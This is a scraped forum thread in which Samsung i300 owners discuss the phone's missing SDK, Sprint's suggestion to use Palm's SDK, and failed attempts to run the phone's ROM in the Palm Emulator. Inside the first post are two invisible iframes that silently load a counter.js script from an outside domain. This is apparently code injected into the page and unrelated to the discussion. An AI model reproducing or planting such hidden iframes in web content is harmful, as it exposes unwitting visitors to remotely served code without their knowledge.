+ Reply to Thread

Thread: Sdk?

3_D

Angry Sdk?

Do we need to mass e-mail Samsung about a lack of a SDK? It seems that they are being way too propriatory and it is preventing us, the users, from getting the most from our expensive phones.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I get the impression that for all the effort they put into it, this is still just a commodity phone to Samsung -- a retail item with a limited shelf-life. When a vendor offers an SDK, it implies a commitment to that platform, at least enough to document and publish an API. And really, there isn't any sign from Samsung that they're interested in making that commitment.

It's not that they're incapable of it: their upcoming Linux-powered handheld indicates that they're willing to play in the open-source world, but they don't seem to include this particular phone in that strategy.

I'm not sure I blame them -- if/when 3G services and the associated packet networking come online here in the Benighted States, this marvelous little device will suddenly be anything but cutting edge. And rather than commit to an API for a device whose obsolescence looms in the near term, I suspect they'd rather leave their options open to change the API as much as then need to to support the next generation of devices. Otherwise, imagine the backward-compatibility issues they'd have to be sensitive to! By leaving open the option to orphan this phone, they save themselves a lot of headaches later on.

I'm anything but happy about it, because this is a terrific phone with fantastic potential, and in truth I don't know any more than anyone else about what's really in their minds at Samsung, but I think this interpretation fits the facts.

Well spoken. The shame...

smartphonecentral.com
    I'm sure others have received similar responses, but this is what I got from Sprint after inquiring about SDKs or other development tools for the i300:

> Besides the manual book that comes with the handset
    > I am not aware of any other manual books. There is a
    > Palm SDK for the I300 and it can be downloaded at
    > www.palm.com. Thanks.

I'm not registered with Palm yet and may have missed the answer to this question, but has anybody tried or been successful in grabbing their ROM and running it in the Palm Emulator?

--Jesse

I ripped the i300's ROM the day after I got it. It wouldn't run under the current version of POSE. Like the Clie and Handera 330, the i300 is going to need its own customized emulator.